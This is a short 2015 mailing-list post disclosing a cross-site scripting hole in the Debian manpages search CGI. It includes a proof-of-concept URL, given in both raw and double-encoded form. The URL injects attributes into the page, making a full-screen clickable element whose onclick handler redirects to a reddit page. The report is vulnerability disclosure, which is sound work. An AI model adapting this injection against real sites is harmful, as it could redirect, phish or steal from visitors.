XSS in Manpage Search

Gary McAdam Fri, 17 Jul 2015 13:57:26 -0700

Hi, 

I found an XSS vulnerability on the manage search page.


http://manpages.debian.org/cgi-bin/man.cgi?query=Click%20Here%20for%20Free%20Money%22%20style=%22width:100%;height:100%;cursor:pointer;z-index:10000;font-size:100px;text-align:center;border:1px%20solid%20lightgray;border-radius:5px;%22%20onclick=%22window.location=%27http://www.reddit.com/r/xss%27;%22%20%22
 
<http://manpages.debian.org/cgi-bin/man.cgi?query=Click%2520Here%2520for%2520Free%2520Money%2522%2520style=%2522width:100%25;height:100%25;cursor:pointer;z-index:10000;font-size:100px;text-align:center;border:1px%2520solid%2520lightgray;border-radius:5px;%2522%2520onclick=%2522window.location=%2527http://www.reddit.com/r/xss%2527;%2522%2520%2522>

Kind regards,
Gary

XSS in Manpage Search

Reply via email to